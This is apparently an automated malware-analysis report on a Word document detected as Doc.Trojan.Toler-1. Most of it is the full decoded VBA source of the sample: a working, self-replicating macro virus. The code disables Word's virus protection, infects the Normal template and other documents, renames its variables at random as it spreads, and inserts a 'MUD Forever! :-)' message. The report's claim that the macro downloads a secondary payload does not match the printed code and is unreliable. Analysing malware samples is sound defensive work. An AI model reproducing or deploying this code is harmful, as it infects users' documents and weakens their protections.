MALICIOUS
180
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains VBA macros, including a Document_Open subroutine, which is a common technique for executing malicious code when a document is opened. The macro attempts to disable virus protection and obfuscates its code, suggesting an intent to download and execute a secondary payload. The ClamAV detection name 'Doc.Trojan.Toler-1' further supports its malicious nature.
Heuristics 3
-
ClamAV: Doc.Trojan.Toler-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Toler-1
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3151 bytes |
SHA-256: 3599b9ee00287aba1a66a34f3f26e52397361739a88e3a757f82c7048661b9c7 |
|||
|
Detection
ClamAV:
Doc.Trojan.Toler-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Tolerance!
Private Type GuogxZ
LldidxZ As Integer
ChckkvZ As Integer
FbcZ As Boolean
End Type
Private Sub Document_Close()
End Sub
Private Sub Document_Open()
Randomize
Options.VirusProtection = False
Dim CjdrZ As Object, IqahxhZ As Object
Set CjdrZ = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule
Set IqahxhZ = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule
Dim VckedryZ As GuogxZ, KpwgZ As GuogxZ: VckedryZ = OphxmZ(CjdrZ): KpwgZ = OphxmZ(IqahxhZ)
If KpwgZ.ChckkvZ = 0 Then
YgxwZ CjdrZ, IqahxhZ, VckedryZ, KpwgZ
Options.SaveNormalPrompt = False
End If
If (VckedryZ.ChckkvZ = 0) Or ((KpwgZ.ChckkvZ <> 0) And (VckedryZ.ChckkvZ <> KpwgZ.ChckkvZ)) Then
YgxwZ IqahxhZ, CjdrZ, KpwgZ, VckedryZ
ActiveDocument.SaveAs (ActiveDocument.FullName)
ElseIf Rnd < 0.3 Then
ActiveDocument.Range(0, 0).InsertParagraphBefore
ActiveDocument.Range(0, 0).InsertBefore "MUD Forever! :-)"
ActiveDocument.SaveAs (ActiveDocument.FullName)
End If
End Sub
Private Sub YgxwZ(LldidxZ As Object, SxsZ As Object, FromP As GuogxZ, ToP As GuogxZ)
Dim IewakhZ As String, CtbrxkZ
IewakhZ = LldidxZ.Lines(FromP.LldidxZ, FromP.ChckkvZ)
CtbrxkZ = Array("RhkcZ", "GuogxZ", "LldidxZ", "SxsZ", "XqlZ", "ChckkvZ", "FbcZ", "CjdrZ", "IqahxhZ", "VckedryZ", "KpwgZ", "YgxwZ", "IewakhZ", "CpwtaviZ", "UtleZ", "RcypZ", "OphxmZ", "DwgyhZ", "CtbrxkZ")
For I = 0 To 18: DwgyhZ IewakhZ, (CtbrxkZ(I)), RhkcZ(IewakhZ): Next I
If ToP.FbcZ Then SxsZ.DeleteLines 1, SxsZ.CountOfLines
SxsZ.AddFromString IewakhZ
End Sub
Private Function RhkcZ(IewakhZ As String) As String
Dim CpwtaviZ As String: CpwtaviZ = ""
While (InStr(IewakhZ, CpwtaviZ) <> 0) Or (Len(CpwtaviZ) < 3)
CpwtaviZ = ""
For I = 1 To 10
If Rnd > 0.5 Then
If Len(CpwtaviZ) = 0 Then
CpwtaviZ = CpwtaviZ + Chr(Int(Rnd * 25 + 65))
Else: CpwtaviZ = CpwtaviZ + Chr(Int(Rnd * 25 + 97))
End If
End If
Next I
CpwtaviZ = CpwtaviZ + "Z"
Wend
RhkcZ = CpwtaviZ
End Function
Private Sub DwgyhZ(IewakhZ As String, UtleZ As String, RcypZ As String)
Dim I As Long
I = 1
While InStr(I, IewakhZ, UtleZ) <> 0
I = InStr(I, IewakhZ, UtleZ)
IewakhZ = Left(IewakhZ, I - 1) + RcypZ + Mid$(IewakhZ, I + Len(UtleZ))
Index = Index + 1
Wend
End Sub
Private Function OphxmZ(XqlZ As Object) As GuogxZ
OphxmZ.LldidxZ = 0
OphxmZ.ChckkvZ = 0
OphxmZ.FbcZ = False
For I = 1 To XqlZ.CountOfLines
If XqlZ.Lines(I, 1) = "' Tolerance!" Then OphxmZ.LldidxZ = I
If XqlZ.Lines(I, 1) = "End Function 'Tolerance!" Then OphxmZ.ChckkvZ = I - OphxmZ.LldidxZ + 1
If InStr(XqlZ.Lines(I, 1), "Private Sub Document_Open()") = 1 Then OphxmZ.FbcZ = True
Next I
End Function 'Tolerance!
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.